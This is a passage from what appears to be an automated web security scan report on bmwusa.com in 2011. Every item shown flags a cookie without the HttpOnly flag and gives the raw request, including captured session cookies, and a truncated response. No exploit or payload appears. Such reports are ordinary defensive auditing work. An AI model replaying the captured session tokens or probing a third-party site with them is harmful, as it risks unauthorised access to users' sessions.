Date: Fri, 21 Jan 2011 21:17:28 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:37:28 GMT;path=/
Content-Length: 202243


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.315. http://www.bmwusa.com/standard/content/vehicles/2011/7/750ixdrivesedan/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/750ixdrivesedan/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/750ixdrivesedan/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:17:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:37:48 GMT;path=/
Content-Length: 212632


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.316. http://www.bmwusa.com/standard/content/vehicles/2011/7/750ixdrivesedan/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/750ixdrivesedan/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/750ixdrivesedan/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:14:54 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:34:54 GMT;path=/
Content-Length: 212633


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.317. http://www.bmwusa.com/standard/content/vehicles/2011/7/750ixdrivesedan/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/750ixdrivesedan/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/750ixdrivesedan/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:17:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:37:26 GMT;path=/
Content-Length: 228916


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.318. http://www.bmwusa.com/standard/content/vehicles/2011/7/750ixdrivesedan/features_and_specs/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/750ixdrivesedan/features_and_specs/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/750ixdrivesedan/features_and_specs/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:16:56 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:36:56 GMT;path=/
Content-Length: 228917


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.319. http://www.bmwusa.com/standard/content/vehicles/2011/7/750ixdrivesedan/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/750ixdrivesedan/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/750ixdrivesedan/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:15:41 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:35:41 GMT;path=/
Content-Length: 217827


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.320. http://www.bmwusa.com/standard/content/vehicles/2011/7/750ixdrivesedan/modelhighlights/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/750ixdrivesedan/modelhighlights/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/750ixdrivesedan/modelhighlights/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:15:21 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:35:21 GMT;path=/
Content-Length: 217828


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.321. http://www.bmwusa.com/standard/content/vehicles/2011/7/750lisedan/7seriessedanmediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/750lisedan/7seriessedanmediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/750lisedan/7seriessedanmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:18:04 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:38:04 GMT;path=/
Content-Length: 202313


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.322. http://www.bmwusa.com/standard/content/vehicles/2011/7/750lisedan/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/750lisedan/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/750lisedan/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:18:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:38:20 GMT;path=/
Content-Length: 212884


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.323. http://www.bmwusa.com/standard/content/vehicles/2011/7/750lisedan/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/750lisedan/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/750lisedan/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:19:19 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:39:18 GMT;path=/
Content-Length: 228584


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.324. http://www.bmwusa.com/standard/content/vehicles/2011/7/750lisedan/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/750lisedan/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/750lisedan/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:19:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:39:15 GMT;path=/
Content-Length: 215840


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.325. http://www.bmwusa.com/standard/content/vehicles/2011/7/750lixdrivesedan/7seriessedanmediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/750lixdrivesedan/7seriessedanmediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/750lixdrivesedan/7seriessedanmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:22:21 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:42:21 GMT;path=/
Content-Length: 202223


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.326. http://www.bmwusa.com/standard/content/vehicles/2011/7/750lixdrivesedan/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/750lixdrivesedan/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/750lixdrivesedan/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:23:04 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:43:04 GMT;path=/
Content-Length: 212740


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.327. http://www.bmwusa.com/standard/content/vehicles/2011/7/750lixdrivesedan/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/750lixdrivesedan/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/750lixdrivesedan/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:19:41 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:39:41 GMT;path=/
Content-Length: 212741


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.328. http://www.bmwusa.com/standard/content/vehicles/2011/7/750lixdrivesedan/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/750lixdrivesedan/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/750lixdrivesedan/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
